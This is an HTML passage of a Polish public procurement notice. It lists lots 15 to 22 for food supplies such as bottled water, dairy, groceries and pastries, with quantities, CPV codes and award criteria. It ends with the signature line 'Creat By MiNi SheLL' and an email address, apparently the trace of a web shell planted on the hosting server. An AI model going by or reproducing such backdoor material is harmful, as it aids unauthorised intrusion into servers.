Drop. Pasztet mix 130g	SZT	100.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Wody mineralne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda Nałęczowianka ng 1,5l	SZT	800
WodaNałęczowianka gaz 1,5l	SZT	200
Woda Nałęczowianka ng 0,5l	SZT	600
Woda Nałęczowianka gaz 0,5l	SZT	320
Woda Nałęczowianka Sprint ng 0,75l	SZT	600
Woda Żywiec ng 1,5l	SZT	320
Woda Żywiec gaz 1,5l	SZT	200
Woda Cisowianka ng 1,5l	SZT	800
Woda Cisowianka gaz 1,5l	SZT	320
Woda Cisowianka ng 0,5l	SZT	1000
woda Cisowianka gaz 0,5l	SZT	600
Woda Muszynianka ng 1,5l	SZT	400
Woda Muszynianka ng 0,6l	SZT	400
Woda Cisowianka sport 0,7l	SZT	400
Wody Żywiec smakowe ng 1,5l	SZT	400.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko UHT 3,2% 1l	Szt	60
Mleko UHT 2% 1l	Szt	60
Mleko UHT 3,2% 0,5l	Szt	50
Mleko UHT 2% 0,5L	Szt	100
Mleko zagęszczone niesłodzone 200g	Szt	240
Mleko zagęszczone niesłodzone 350g	Szt	140
Śmietanka do kawy 10*10g	Szt	200
Maślanka owocowa 400g	Szt	50
Maślanka naturalna 400g	Szt	50
Masło lurpak 10g*100szt	Kar	4
Masło górskie 100g	Szt	80
Serek do chleba 100g	Szt	100
Serek bieluch 150g	Szt	480
Serek wiejski 200g	Szt	480
Homo wanilia 140g	Szt	480
Serek jogobella 140g	Szt	160
Ser top 200g	Szt	100
Ser top 100g	Kg	40
Ser żółty 150g plastry	Szt	100
Jogurt jogobella 150g	Szt	800
Jogurt naturalny 200g	Szt	400
Jogurt 7 zbóż 150g	Szt	200
Jogurt z musli 200g	Szt	200
Jogurt actimel 4 100g	Szt	40
Kefir 250g	Szt	100
Jogurt pitny 320g	Szt	60.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pieczywo chrupkie i suchary.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pieczywo chrupkie różne smaki	SZT	90
Suchary delikatesowe i bez cukrowe	SZT	90
Sonko wafle ryżowe - różne smaki	SZT	90
Maca	SZT	30.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pieczarki konserwowe 330ml	SZT	60
Papryka konserwowa 900ml	SZT	60
Papryka konserwowa 380ml	SZT	60
Ogórek konserwowy 900ml	SZT	100
Oliwki zielone b/pestek 150g	SZT	20.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cukier 	kg	560
Herbata granulowana (100g)	szt.	200
Kawa zbożowa kujawska	kg	40
Biszkopty	szt.	10
Suchary	szt.	20
Mąka ziemniaczana 	kg	40
Ryż	kg	170
Kasza manna	kg	40
Kasza jęczmienna drobna, gruba	kg	56
Płatki jęczmienne	kg	25
Płatki owsiane	kg	25
Kleik ryżowy	szt.	80
Kaszka mleczno-ryżowa	szt.	16
Chrzan tarty	szt.	4
Musztarda (350g) 	szt.	10
Koncentrat pomidorowy 190g 	szt.	56
Koncentrat pomidorowy 70g	szt.	26
Koncentrad pomidorowy 0,9l	szt.	30.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Warzywa strączkowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Groch łuskany	kg	20
Fasola Jaś	kg	30
Fasola drobna	kg	40.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.22.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Dżem , miód , pasztecik.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dżem 	szt	1760
Miód	szt	1200
Pasztecik drobiowy	szt	1500.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Wyroby cukiernicze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pączki z marmoladą - puder	SZT	850
Pączki z marmoladą - pomada	SZT	850
Pączki z nadzieniem( truskawka, jabłko itp.)	SZT	160
Paczki wiedeńskie, kukułka, malibu	SZT	1600
Bułki słodkie	SZT	5600
Pizza bułka z pieczarkami	SZT	300
Ciastko W-Z	SZT	300
Ciastko kremówka	SZT	300
Deser Marcinek	SZT	300
Babeczki z owocami	SZT	300
Placek z kruszonką	SZT	40
Makowiec przekładany	SZT	40
Drożdżówka duża	SZT	40
Drożdżówka owocowa	SZT	40
Oponki wagowe	Kg	10
Małe pączki na wagę	Kg	10
Rogaliczki krucho - drożdżowe	Kg	10
Ptyś budyniowy - waga	Kg	10
Maślane z nadzieniem	Kg	10.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.23.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com